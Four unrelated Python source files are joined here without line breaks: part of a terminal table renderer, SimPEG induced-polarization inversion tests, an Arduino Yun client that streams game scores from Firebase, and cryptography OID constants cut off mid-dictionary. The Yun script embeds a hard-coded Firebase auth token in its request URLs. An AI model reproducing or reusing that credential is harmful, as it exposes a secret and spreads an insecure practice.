self._prepare_convert_aggregates() def _prepare_convert_groups(self): self.groups_converted = [] for fgroup in self.groups_entry_data: group_converted = [] self.groups_converted.append(group_converted) for edata in fgroup: if edata.value is None: if edata.is_error: group_converted.append(self.rsheet.decleration.error_entry) else: group_converted.append(self.rsheet.decleration.no_entry) else: group_converted.append(str(self.decleration.converter(edata))) def _prepare_convert_aggregates(self): if self.decleration.aggregator is None: return self.aggregates_converted = [] if self.decleration.aggregator.converter is None: converter = self.decleration.converter else: converter = self.decleration.aggregator.converter for aggr_ix, aggregate in enumerate(self.aggregates): if aggregate is None: self.aggregates_converted.append("") elif aggregate is NoEntry: self.aggregates_converted.append(self.rsheet.decleration.no_entry) elif aggregate is ErrorEntry: self.aggregates_converted.append(self.rsheet.decleration.error_entry) else: self.aggregates_converted.append( str(converter(decleration.EntryData(value=aggregate))) ) def entry_value(self, entry): if entry is ErrorEntry or entry is NoEntry: return None return entry def get_kv(self, group_ix, entry_ix): entry = self.groups[group_ix][entry_ix] return self.decleration.key, self.entry_value(entry) def has_aggregate(self): return self.decleration.aggregator is not None def n_entries_in_group(self, group_ix): return len(self.groups[group_ix]) def entry_format(self, group_ix, entry_ix): """ Arguments: group_ix -- Index of a group in self.groups. entry_ix -- Index of an entry within a group. Return: Tuple of form (string_alert, format_function). The string_alert can be used when sheet is displayed in a plain text rendering (currently only for testing format). """ edata = self.groups_entry_data[group_ix][entry_ix] if edata.is_error: return None, lambda v: terminal.fg_magenta() + v + terminal.fg_not_magenta() for name, formatter in self.decleration.formatters: format_fn = formatter(edata) if format_fn is not None: return name, format_fn return None, None class BaseRSheetCLI(BaseRSheet): def _do_render_title(self, render, width): # XXX - Same as column. filler = self.decleration.title_fill columns = self.terminal_size.columns min_columns = len(self.title) + 6 if min_columns < columns: min_columns = columns n_repeates = width // min_columns if width > min_columns and n_repeates != 1: extra_columns = (columns % min_columns) // n_repeates new_width = min_columns + extra_columns t = "".join( [self.title.center(new_width, filler) for _ in range(n_repeates)] ) t = t.ljust(width, filler) else: t = self.title.center(width, filler) if len(t) > 0: if not t.startswith(filler): t = filler + t if not t.endswith(filler): t += filler title_width = len(t) t = terminal.bold() + t + terminal.unbold() render.append(t) return title_width def _do_render_description(self, render, line_width, desc_width): # XXX - Same as column. if self.description is None or self.description == "": return [] tdesc = self.description[:].split(" ") lines = [] words = [] while tdesc != []: words.append(tdesc.pop(0)) line = " ".join(words) if len(line) >= desc_width: if len(words) > 1: tdesc.insert(0, words.pop()) line = " ".join(words) words = [] lines.append(line) else: if words: line = " ".join(words) lines.append(line) description = [ terminal.dim() + line.center(line_width) + terminal.reset() for line in lines ] description = "\n".join(description) render.append(description) def _do_render_n_rows(self, render, n_records): # XXX - Same as column. render.append( terminal.dim() + "Number of rows: {}".format(n_records) + terminal.undim() )
from __future__ import print_function import unittest import discretize from SimPEG import ( utils, maps, data_misfit, regularization, optimization, inversion, inverse_problem, tests, ) import numpy as np from SimPEG.electromagnetics import spectral_induced_polarization as sip try: from pymatsolver import Pardiso as Solver except ImportError: from SimPEG import SolverLU as Solver np.random.seed(38) class SIPProblemTestsCC(unittest.TestCase): def setUp(self): cs = 25.0 hx = [(cs, 0, -1.3), (cs, 21), (cs, 0, 1.3)] hz = [(cs, 0, -1.3), (cs, 20)] mesh = discretize.TensorMesh([hx, hz], x0="CN") blkind0 = utils.model_builder.getIndicesSphere( np.r_[-100.0, -200.0], 75.0, mesh.gridCC ) blkind1 = utils.model_builder.getIndicesSphere( np.r_[100.0, -200.0], 75.0, mesh.gridCC ) sigma = np.ones(mesh.nC) * 1e-2 eta = np.zeros(mesh.nC) tau = np.ones_like(sigma) * 1.0 eta[blkind0] = 0.1 eta[blkind1] = 0.1 tau[blkind0] = 0.1 tau[blkind1] = 0.1 x = mesh.vectorCCx[(mesh.vectorCCx > -155.0) & (mesh.vectorCCx < 155.0)] Aloc = np.r_[-200.0, 0.0] Bloc = np.r_[200.0, 0.0] M = utils.ndgrid(x - 25.0, np.r_[0.0]) N = utils.ndgrid(x + 25.0, np.r_[0.0]) times = np.arange(10) * 1e-3 + 1e-3 rx = sip.receivers.Dipole(M, N, times) src = sip.sources.Dipole([rx], Aloc, Bloc) survey = sip.Survey([src]) wires = maps.Wires(("eta", mesh.nC), ("taui", mesh.nC)) problem = sip.Simulation2DCellCentered( mesh, rho=1.0 / sigma, etaMap=wires.eta, tauiMap=wires.taui, verbose=False, solver=Solver, survey=survey, ) mSynth = np.r_[eta, 1.0 / tau] problem.model = mSynth dobs = problem.make_synthetic_data(mSynth, add_noise=True) # Now set up the problem to do some minimization dmis = data_misfit.L2DataMisfit(data=dobs, simulation=problem) reg = regularization.Tikhonov(mesh) opt = optimization.InexactGaussNewton( maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6 ) invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=1e4) inv = inversion.BaseInversion(invProb) self.inv = inv self.reg = reg self.p = problem self.mesh = mesh self.m0 = mSynth self.survey = survey self.dmis = dmis self.dobs = dobs def test_misfit(self): passed = tests.checkDerivative( lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)], self.m0, plotIt=False, num=3, ) self.assertTrue(passed) def test_adjoint(self): # Adjoint Test # u = np.random.rand(self.mesh.nC*self.survey.nSrc) v = np.random.rand(self.mesh.nC * 2) w = np.random.rand(self.survey.nD) wtJv = w.dot(self.p.Jvec(self.m0, v)) vtJtw = v.dot(self.p.Jtvec(self.m0, w)) passed = np.abs(wtJv - vtJtw) < 1e-10 print("Adjoint Test", np.abs(wtJv - vtJtw), passed) self.assertTrue(passed) def test_dataObj(self): passed = tests.checkDerivative( lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=3 ) self.assertTrue(passed) class SIPProblemTestsN(unittest.TestCase): def setUp(self): cs = 25.0 hx = [(cs, 0, -1.3), (cs, 21), (cs, 0, 1.3)] hz = [(cs, 0, -1.3), (cs, 20)] mesh = discretize.TensorMesh([hx, hz], x0="CN") blkind0 = utils.model_builder.getIndicesSphere( np.r_[-100.0, -200.0], 75.0, mesh.gridCC ) blkind1 = utils.model_builder.getIndicesSphere( np.r_[100.0, -200.0], 75.0, mesh.gridCC ) sigma = np.ones(mesh.nC) * 1e-2 eta = np.zeros(mesh.nC) tau = np.ones_like(sigma) * 1.0 eta[blkind0] = 0.1 eta[blkind1] = 0.1 tau[blkind0] = 0.1 tau[blkind1] = 0.1 x = mesh.vectorCCx[(mesh.vectorCCx > -155.0) & (mesh.vectorCCx < 155.0)] Aloc = np.r_[-200.0, 0.0] Bloc = np.r_[200.0, 0.0] M = utils.ndgrid(x - 25.0, np.r_[0.0]) N = utils.ndgrid(x + 25.0, np.r_[0.0]) times = np.arange(10) * 1e-3 + 1e-3 rx = sip.receivers.Dipole(M, N, times) src = sip.sources.Dipole([rx], Aloc, Bloc) survey = sip.Survey([src]) wires = maps.Wires(("eta", mesh.nC), ("taui", mesh.nC)) problem = sip.Simulation2DNodal( mesh, sigma=sigma, etaMap=wires.eta, tauiMap=wires.taui, verbose=False, solver=Solver, survey=survey, ) mSynth = np.r_[eta, 1.0 / tau] problem.model = mSynth dobs = problem.make_synthetic_data(mSynth, add_noise=True) # Now set up the problem to do some minimization dmis = data_misfit.L2DataMisfit(data=dobs, simulation=problem) reg = regularization.Tikhonov(mesh) opt = optimization.InexactGaussNewton( maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6 ) invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=1e4) inv = inversion.BaseInversion(invProb) self.inv = inv self.reg = reg self.p = problem self.mesh = mesh self.m0 = mSynth self.survey = survey self.dmis = dmis self.dobs = dobs def test_misfit(self): passed = tests.checkDerivative( lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)], self.m0, plotIt=False, num=3, ) self.assertTrue(passed) def test_adjoint(self): # Adjoint Test v = np.random.rand(self.mesh.nC * 2) w = np.random.rand(self.survey.nD) wtJv = w.dot(self.p.Jvec(self.m0, v)) vtJtw = v.dot(self.p.Jtvec(self.m0, w)) passed = np.abs(wtJv - vtJtw) < 1e-8 print("Adjoint Test", np.abs(wtJv - vtJtw), passed) self.assertTrue(passed) def test_dataObj(self): passed = tests.checkDerivative( lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=2 ) self.assertTrue(passed) class SIPProblemTestsN_air(unittest.TestCase): def setUp(self): cs = 25.0 hx = [(cs, 0, -1.3), (cs, 21), (cs, 0, 1.3)] hz = [(cs, 0, -1.3), (cs, 20)] mesh = discretize.TensorMesh([hx, hz], x0="CN") blkind0 = utils.model_builder.getIndicesSphere( np.r_[-100.0, -200.0], 75.0, mesh.gridCC ) blkind1 = utils.model_builder.getIndicesSphere( np.r_[100.0, -200.0], 75.0, mesh.gridCC ) sigma = np.ones(mesh.nC) * 1e-2 eta = np.zeros(mesh.nC) tau = np.ones_like(sigma) * 1.0 c = np.ones_like(sigma) eta[blkind0] = 0.1 eta[blkind1] = 0.1 tau[blkind0] = 0.1 tau[blkind1] = 0.1 x = mesh.vectorCCx[(mesh.vectorCCx > -155.0) & (mesh.vectorCCx < 155.0)] Aloc = np.r_[-200.0, -50] Bloc = np.r_[200.0, -50] M = utils.ndgrid(x - 25.0, np.r_[0.0]) N = utils.ndgrid(x + 25.0, np.r_[0.0]) airind = mesh.gridCC[:, 1] > -40 actmapeta = maps.InjectActiveCells(mesh, ~airind, 0.0) actmaptau = maps.InjectActiveCells(mesh, ~airind, 1.0) actmapc = maps.InjectActiveCells(mesh, ~airind, 1.0) times = np.arange(10) * 1e-3 + 1e-3 rx = sip.receivers.Dipole(M, N, times) src = sip.sources.Dipole([rx], Aloc, Bloc) survey = sip.Survey([src]) wires = maps.Wires( ("eta", actmapeta.nP), ("taui", actmaptau.nP), ("c", actmapc.nP) ) problem = sip.Simulation2DNodal( mesh, sigma=sigma, etaMap=actmapeta * wires.eta, tauiMap=actmaptau * wires.taui, cMap=actmapc * wires.c, actinds=~airind, solver=Solver, survey=survey, ) mSynth = np.r_[eta[~airind], 1.0 / tau[~airind], c[~airind]] dobs = problem.make_synthetic_data(mSynth, add_noise=True) # Now set up the problem to do some minimization dmis = data_misfit.L2DataMisfit(data=dobs, simulation=problem) reg_eta = regularization.Simple(mesh, mapping=wires.eta, indActive=~airind) reg_taui = regularization.Simple(mesh, mapping=wires.taui, indActive=~airind) reg_c = regularization.Simple(mesh, mapping=wires.c, indActive=~airind) reg = reg_eta + reg_taui + reg_c opt = optimization.InexactGaussNewton( maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6 ) invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=1e4) inv = inversion.BaseInversion(invProb) self.inv = inv self.reg = reg self.p = problem self.mesh = mesh self.m0 = mSynth self.survey = survey self.dmis = dmis self.dobs = dobs def test_misfit(self): passed = tests.checkDerivative( lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)], self.m0, plotIt=False, num=3, ) self.assertTrue(passed) def test_adjoint(self): # Adjoint Test v = np.random.rand(self.reg.mapping.nP) w = np.random.rand(self.survey.nD) wtJv = w.dot(self.p.Jvec(self.m0, v)) vtJtw = v.dot(self.p.Jtvec(self.m0, w)) passed = np.abs(wtJv - vtJtw) < 1e-8 print("Adjoint Test", np.abs(wtJv - vtJtw), passed) self.assertTrue(passed) def test_dataObj(self): passed = tests.checkDerivative( lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=3 ) self.assertTrue(passed) if __name__ == "__main__": unittest.main()
# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. """ The Yun's Atheros-side client to the firebase streaming API. The script is responsible for streaming from: 1. The table's current game. 2. The current game's data (scores). 3. The Yun bridgeclient. And sending to: 1. The Yun bridgeclient. There are a few constraints here that prevent this from being a nice script. Most importantly we have no space (flash or ram) for dependencies like requests or an SSE client which depend on requests anyway. Still, it's nice to be reminded of the early 2000s when Python was still fun. """ import json import logging import select import socket import sys import time import urllib2 import uuid # Now try to load the bridge library which is installed in the following bizarre # location on the Yun. If they had only thought to add "site-packages" to # that path we wouldn't need this. sys.path.insert(0, '/usr/lib/python2.7/bridge/') try: from bridgeclient import BridgeClient bridge_available = True except ImportError: # Use the fake bridge client - we are developing off the Yun. bridge_available = False class BridgeClient(object): """A fake fake.""" class FakeBridgeClient(object): """A bridge that can be run off a yun, for testing.""" def begin(self): pass def mailbox(self, msg): print 'SENDING', msg def mailbox_read(self, timeout=0): pass def socket_open(self): pass def close(self): pass class CustomBridgeClient(BridgeClient): """Customized bridge client to add message receiving functionality. Another strange decision to omit mailbox_read from the bridge client, since the equivalent API to send messages on the Arduino side *is* implemented. """ def mailbox_read(self, timeout=0): """Read a single mailbox message.""" data = self.socket_open() r = self.wait_response(data, timeout) m = None if r is not None: try: m = r['data'] except: pass self.socket_close() return m def create_bridge(): """Creates the correct bridge if we are on or off the Yun.""" if bridge_available: return CustomBridgeClient() else: return FakeBridgeClient() bridge = create_bridge() DATA_NAME = "https://functions-prerelease-11-bb35b.firebaseio.com" DATA_POST = json.dumps({'.sv': 'timestamp'}) DATA_AUTH = ('?auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOj' 'E0NjU2NjMwMDksInYiOjAsImQiOnsidWlkIjoiYmFuYW5hIn0sIml' 'hdCI6MTQ2MzA3MTAwOX0.qEaQ0mSFd48a_NiUIX53OI6PuLKOOFRvJ' '9akcBMEKH4') TABLE_INTERVAL = 60 CONFIG_INTERVAL = 10 GAME_INTERVAL = 30 LOG_FORMAT = '%(asctime)s:%(levelname)s:%(message)s' DATE_FORMAT = '%a:%I:%M:%S' logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT, datefmt=DATE_FORMAT) def log(msg): return logging.info(msg) class Timer(object): def __init__(self): self.reset() def reset(self): self.start = time.time() def past(self, seconds): return (time.time() - self.start) > seconds class Client(object): def __init__(self): ##### emulating another board self.board_id = 'B4218AF83536' log('my real mac>%s' % self.get_mac()) self.board_id = self.get_mac() self.game_id = None self.score = [0, 0] self.table_conn = None self.game_conn = None self.table_timer = None self.game_timer = None self.config_timer = None self.can_loop = True def start(self): """Starts the table and blocks.""" self.send_config() self.config_timer = Timer() self.listen_table() self.loop() def loop(self): """Main loop.""" while self.can_loop: if self.table_conn is None: self.listen_table() self.check_timers() self.receive_bridge() self.receive_http() time.sleep(0.1) def open_stream(self, url): """Opens a Firebase url as an event stream.""" req = urllib2.Request(url) req.add_header('Accept', 'text/event-stream') opener = urllib2.build_opener() try: resp = opener.open(req, timeout=3) except urllib2.URLError: return # Unbuffered. Undocumented superfix. resp.fp._rbufsize = -1 return resp def listen_table(self): """Listen to the current table stream for new games.""" self.stop_listen_table() url = '%s/tables/%s/current_game.json%s' % ( DATA_NAME, self.board_id, DATA_AUTH) self.table_conn = self.open_stream(url) self.table_timer = Timer() def listen_game(self): """Listen to the current game.""" self.stop_listen_game() url = '%s%s.json%s' % (DATA_NAME, self.game_id, DATA_AUTH) self.game_conn = self.open_stream(url) self.game_timer = Timer() def stop_listen_table(self): if self.table_conn is not None: self.table_conn.close() def stop_listen_game(self): if self.game_conn is not None: self.game_conn.close() def start_bridge(self): """Start the bridge, and return it.""" try: bridge.begin() return True except socket.error: return False def check_timers(self): """Check the timers, and if so restart ourselves.""" if self.table_timer.past(TABLE_INTERVAL): self.listen_table() if self.game_timer is not None and self.game_timer.past(5): self.listen_game() if self.config_timer.past(CONFIG_INTERVAL): self.send_config() self.config_timer = Timer() def receive_bridge(self): """Reads from the bridge, and dispatches accordingly""" if not self.start_bridge(): return msg = bridge.mailbox_read(); if msg: print msg self.send_button(msg.strip()) def receive_http(self): """Reads from the available http sockets, and dispatches accordingly.""" sel = [] if self.game_conn is not None: sel.append(self.game_conn) if self.table_conn is not None: sel.append(self.table_conn) se = select.select(sel, [], sel, 0.1) ss = se[0] for resp in ss: first = resp.readline().strip() if first == '': first = resp.readline().strip() second = resp.readline().strip() if first != "event: put": continue data = json.loads(second[6:]) if resp is self.table_conn: self.game_received(data) elif resp is self.game_conn: self.score_received(data) def send_button(self, button_name): """Send a named button to Firebase after attaching the board ID.""" button_id = '%s-%s' % (button_name, self.board_id) url = '%s/switches/%s/hits.json%s' % (DATA_NAME, button_id, DATA_AUTH) log('sending button>%s' % url) req = urllib2.Request(url, DATA_POST, {'Content-Type': 'application/json'}) resp = urllib2.urlopen(req) content = resp.read() log('sending button<%s' % content) resp.close() def game_received(self, m): """Receives a message over the current table stream.""" game = m['data'] if game != self.game_id: self.game_id = game self.listen_game() def score_received(self, m): """Receives a score ove the current game stream.""" path = m['path'] data = m['data'] if path == "/": self.score[0] = data.get('team_1_score', self.score[0]) self.score[1] = data.get('team_2_score', self.score[1]) elif path == "/team_1_score": self.score[0] = data elif path == "/team_2_score": self.score[1] = data self.send_score() def send_score(self): """Sends the score to the Arduino over the mailbox.""" score = 'sco:%s %s' % tuple(self.score) if not self.start_bridge(): return bridge.mailbox(score) def send_config(self): """Sends the config to the Arduino over the mailbox.""" mac = 'mac:%s' % self.board_id eip = 'eip:%s' % self.get_ip() if not self.start_bridge(): return bridge.mailbox(mac) bridge.mailbox(eip) def get_mac(self): return '%012X' % uuid.getnode() def get_ip(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) s.connect(('<broadcast>', 0)) return s.getsockname()[0] except socket.error: return 'no idea' if __name__ == '__main__': c = Client() c.start()
# This file is dual licensed under the terms of the Apache License, Version # 2.0, and the BSD License. See the LICENSE file in the root of this repository # for complete details. from __future__ import absolute_import, division, print_function from cryptography import utils from cryptography.hazmat.primitives import hashes class ObjectIdentifier(object): def __init__(self, dotted_string): self._dotted_string = dotted_string nodes = self._dotted_string.split(".") intnodes = [] # There must be at least 2 nodes, the first node must be 0..2, and # if less than 2, the second node cannot have a value outside the # range 0..39. All nodes must be integers. for node in nodes: try: intnodes.append(int(node, 0)) except ValueError: raise ValueError( "Malformed OID: %s (non-integer nodes)" % ( self._dotted_string)) if len(nodes) < 2: raise ValueError( "Malformed OID: %s (insufficient number of nodes)" % ( self._dotted_string)) if intnodes[0] > 2: raise ValueError( "Malformed OID: %s (first node outside valid range)" % ( self._dotted_string)) if intnodes[0] < 2 and intnodes[1] >= 40: raise ValueError( "Malformed OID: %s (second node outside valid range)" % ( self._dotted_string)) def __eq__(self, other): if not isinstance(other, ObjectIdentifier): return NotImplemented return self.dotted_string == other.dotted_string def __ne__(self, other): return not self == other def __repr__(self): return "<ObjectIdentifier(oid={0}, name={1})>".format( self.dotted_string, self._name ) def __hash__(self): return hash(self.dotted_string) @property def _name(self): return _OID_NAMES.get(self, "Unknown OID") dotted_string = utils.read_only_property("_dotted_string") class ExtensionOID(object): SUBJECT_DIRECTORY_ATTRIBUTES = ObjectIdentifier("2.5.29.9") SUBJECT_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.14") KEY_USAGE = ObjectIdentifier("2.5.29.15") SUBJECT_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.17") ISSUER_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.18") BASIC_CONSTRAINTS = ObjectIdentifier("2.5.29.19") NAME_CONSTRAINTS = ObjectIdentifier("2.5.29.30") CRL_DISTRIBUTION_POINTS = ObjectIdentifier("2.5.29.31") CERTIFICATE_POLICIES = ObjectIdentifier("2.5.29.32") POLICY_MAPPINGS = ObjectIdentifier("2.5.29.33") AUTHORITY_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.35") POLICY_CONSTRAINTS = ObjectIdentifier("2.5.29.36") EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37") FRESHEST_CRL = ObjectIdentifier("2.5.29.46") INHIBIT_ANY_POLICY = ObjectIdentifier("2.5.29.54") AUTHORITY_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.1") SUBJECT_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.11") OCSP_NO_CHECK = ObjectIdentifier("1.3.6.1.5.5.7.48.1.5") CRL_NUMBER = ObjectIdentifier("2.5.29.20") class CRLEntryExtensionOID(object): CERTIFICATE_ISSUER = ObjectIdentifier("2.5.29.29") CRL_REASON = ObjectIdentifier("2.5.29.21") INVALIDITY_DATE = ObjectIdentifier("2.5.29.24") class NameOID(object): COMMON_NAME = ObjectIdentifier("2.5.4.3") COUNTRY_NAME = ObjectIdentifier("2.5.4.6") LOCALITY_NAME = ObjectIdentifier("2.5.4.7") STATE_OR_PROVINCE_NAME = ObjectIdentifier("2.5.4.8") ORGANIZATION_NAME = ObjectIdentifier("2.5.4.10") ORGANIZATIONAL_UNIT_NAME = ObjectIdentifier("2.5.4.11") SERIAL_NUMBER = ObjectIdentifier("2.5.4.5") SURNAME = ObjectIdentifier("2.5.4.4") GIVEN_NAME = ObjectIdentifier("2.5.4.42") TITLE = ObjectIdentifier("2.5.4.12") GENERATION_QUALIFIER = ObjectIdentifier("2.5.4.44") DN_QUALIFIER = ObjectIdentifier("2.5.4.46") PSEUDONYM = ObjectIdentifier("2.5.4.65") DOMAIN_COMPONENT = ObjectIdentifier("0.9.2342.19200300.100.1.25") EMAIL_ADDRESS = ObjectIdentifier("1.2.840.113549.1.9.1") JURISDICTION_COUNTRY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.3") JURISDICTION_LOCALITY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.1") JURISDICTION_STATE_OR_PROVINCE_NAME = ObjectIdentifier( "1.3.6.1.4.1.311.60.2.1.2" ) BUSINESS_CATEGORY = ObjectIdentifier("2.5.4.15") class SignatureAlgorithmOID(object): RSA_WITH_MD5 = ObjectIdentifier("1.2.840.113549.1.1.4") RSA_WITH_SHA1 = ObjectIdentifier("1.2.840.113549.1.1.5") RSA_WITH_SHA224 = ObjectIdentifier("1.2.840.113549.1.1.14") RSA_WITH_SHA256 = ObjectIdentifier("1.2.840.113549.1.1.11") RSA_WITH_SHA384 = ObjectIdentifier("1.2.840.113549.1.1.12") RSA_WITH_SHA512 = ObjectIdentifier("1.2.840.113549.1.1.13") ECDSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10045.4.1") ECDSA_WITH_SHA224 = ObjectIdentifier("1.2.840.10045.4.3.1") ECDSA_WITH_SHA256 = ObjectIdentifier("1.2.840.10045.4.3.2") ECDSA_WITH_SHA384 = ObjectIdentifier("1.2.840.10045.4.3.3") ECDSA_WITH_SHA512 = ObjectIdentifier("1.2.840.10045.4.3.4") DSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10040.4.3") DSA_WITH_SHA224 = ObjectIdentifier("2.16.840.1.101.3.4.3.1") DSA_WITH_SHA256 = ObjectIdentifier("2.16.840.1.101.3.4.3.2") _SIG_OIDS_TO_HASH = { SignatureAlgorithmOID.RSA_WITH_MD5.dotted_string: hashes.MD5(), SignatureAlgorithmOID.RSA_WITH_SHA1.dotted_string: hashes.SHA1(), SignatureAlgorithmOID.RSA_WITH_SHA224.dotted_string: hashes.SHA224(), SignatureAlgorithmOID.RSA_WITH_SHA256.dotted_string: hashes.SHA256(), SignatureAlgorithmOID.RSA_WITH_SHA384.dotted_string: hashes.SHA384(), SignatureAlgorithmOID.RSA_WITH_SHA512.dotted_string: hashes.SHA512(), SignatureAlgorithmOID.ECDSA_WITH_SHA1.dotted_string: hashes.SHA1(), SignatureAlgorithmOID.ECDSA_WITH_SHA224.dotted_string: hashes.SHA224(), SignatureAlgorithmOID.ECDSA_WITH_SHA256.dotted_string: hashes.SHA256(), SignatureAlgorithmOID.ECDSA_WITH_SHA384.dotted_string: hashes.SHA384(), SignatureAlgorithmOID.ECDSA_WITH_SHA512.dotted_string: hashes.SHA512(), SignatureAlgorithmOID.DSA_WITH_SHA1.dotted_string: hashes.SHA1(), SignatureAlgorithmOID.DSA_WITH_SHA224.dotted_string: hashes.SHA224(), SignatureAlgorithmOID.DSA_WITH_SHA256.dotted_string: hashes.SHA256() } class ExtendedKeyUsageOID(object): SERVER_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.1") CLIENT_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.2") CODE_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.3") EMAIL_PROTECTION = ObjectIdentifier("1.3.6.1.5.5.7.3.4") TIME_STAMPING = ObjectIdentifier("1.3.6.1.5.5.7.3.8") OCSP_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.9") class AuthorityInformationAccessOID(object): CA_ISSUERS = ObjectIdentifier("1.3.6.1.5.5.7.48.2") OCSP = ObjectIdentifier("1.3.6.1.5.5.7.48.1") class CertificatePoliciesOID(object): CPS_QUALIFIER = ObjectIdentifier("1.3.6.1.5.5.7.2.1") CPS_USER_NOTICE = ObjectIdentifier("1.3.6.1.5.5.7.2.2") ANY_POLICY = ObjectIdentifier("2.5.29.32.0") _OID_NAMES = { NameOID.COMMON_NAME: "commonName", NameOID.COUNTRY_NAME: "countryName", NameOID.LOCALITY_NAME: "localityName", NameOID.STATE_OR_PROVINCE_NAME: "stateOrProvinceName", NameOID.ORGANIZATION_NAME: "organizationName", NameOID.ORGANIZATIONAL_UNIT_NAME: "organizationalUnitName", NameOID.SERIAL_NUMBER: "serialNumber", NameOID.SURNAME: "surname", NameOID.GIVEN_NAME: "givenName", NameOID.TITLE: "title", NameOID.GENERATION_QUALIFIER: "generationQualifier", NameOID.DN_QUALIFIER: "dnQualifier", NameOID.PSEUDONYM: "pseudonym", NameOID.DOMAIN_COMPONENT: "domainComponent", NameOID.EMAIL_ADDRESS: "emailAddress", NameOID.JURISDICTION_COUNTRY_NAME: "jurisdictionCountryName", NameOID.JURISDICTION_LOCALITY_NAME: "jurisdictionLocalityName", NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME: ( "jurisdictionStateOrProvinceName" ), NameOID.BUSINESS_CATEGORY: "businessCategory", SignatureAlgorithmOID.RSA_WITH_MD5: "md5WithRSAEncryption", SignatureAlgorithmOID.RSA_WITH_SHA1: "sha1WithRSAEncryption", SignatureAlgorithmOID.RSA_WITH_SHA224: "sha224WithRSAEncryption", SignatureAlgorithmOID.RSA_WITH_SHA256: "sha256WithRSAEncryption", SignatureAlgorithmOID.RSA_WITH_SHA384: "sha384WithRSAEncryption", SignatureAlgorithmOID.RSA_WITH_SHA512: "sha512WithRSAEncryption", SignatureAlgorithmOID.ECDSA_WITH_SHA1: "ecdsa-with-SHA1", SignatureAlgorithmOID.ECDSA_WITH_SHA224: "ecdsa-with-SHA224", SignatureAlgorithmOID.ECDSA_WITH_SHA256: "ecdsa-with-SHA256", SignatureAlgorithmOID.ECDSA_WITH_SHA384: "ecdsa-with-SHA384", SignatureAlgorithmOID.ECDSA_WITH_SHA512: "ecdsa-with-SHA512", SignatureAlgorithmOID.DSA_WITH_SHA1: "dsa-with-sha1", SignatureAlgorithmOID.DSA_WITH_SHA224: "dsa-with-sha224", SignatureAlgorithmOID.DSA_WITH_SHA256: "dsa-with-sha256", ExtendedKeyUsageOID.SERVER_AUTH: "serverAuth", ExtendedKeyUsageOID.CLIENT_AUTH: "clientAuth", ExtendedKeyUsageOID.CODE_SIGNING: "codeSigning", ExtendedKeyUsageOID.EMAIL_PROTECTION: "emailProtection", ExtendedKeyUsageOID.TIME_STAMPING: "timeStamping", ExtendedKeyUsageOID.OCSP_SIGNING: "OCSPSigning", ExtensionOID.SUBJECT_DIRECTORY_ATTRIBUTES: "subjectDirectoryAttributes", ExtensionOID.SUBJECT_KEY_IDENTIFIER: "subjectKeyIdentifier", ExtensionOID.KEY_USAGE: "keyUsage", ExtensionOID.SUBJECT_ALTERNATIVE_NAME: "subjectAltName", ExtensionOID.ISSUER_ALTERNATIVE_NAME: "issuerAltName", ExtensionOID.BASIC_CONSTRAINTS: "basicConstraints", CRLEntryExtensionOID.CRL_REASON: "cRLReason", CRLEntryExtensionOID.INVALIDITY_DATE: "invalidityDate", CRLEntryExtensionOID.CERTIFICATE_ISSUER: "certificateIssuer", ExtensionOID.NAME_CONSTRAINTS: "nameConstraints", ExtensionOID.CRL_DISTRIBUTION_POINTS: "cRLDistributionPoints", ExtensionOID.CERTIFICATE_POLICIES: "certificatePolicies", ExtensionOID.POLICY_MAPPINGS: "policyMappings", ExtensionOID.AUTHORITY_KEY_IDENTIFIER: "authorityKeyIdentifier", ExtensionOID.POLICY_CONSTRAINTS: "policyConstraints", ExtensionOID.EXTENDED_KEY_USAGE: "extendedKeyUsage", ExtensionOID.FRESHEST_CRL: "freshestCRL", ExtensionOID.INHIBIT_ANY_POLICY: "inhibitAnyPolicy", ExtensionOID.AUTHORITY_INFORMATION_ACCESS: "authorityInfoAccess", ExtensionOID.SUBJECT_INFORMATION_ACCESS: "subjectInfoAccess", ExtensionOID.OCSP_NO_CHECK: "OCSPNoCheck", ExtensionOID.CRL_NUMBER: "cRLNumber", AuthorityInformationAccessOID.OCSP: "OCSP", AuthorityInformationAccessOID.CA_ISSUERS: "caIssuers", CertificatePoliciesOID.CPS_QUALIFIER: "id-qt-cps", 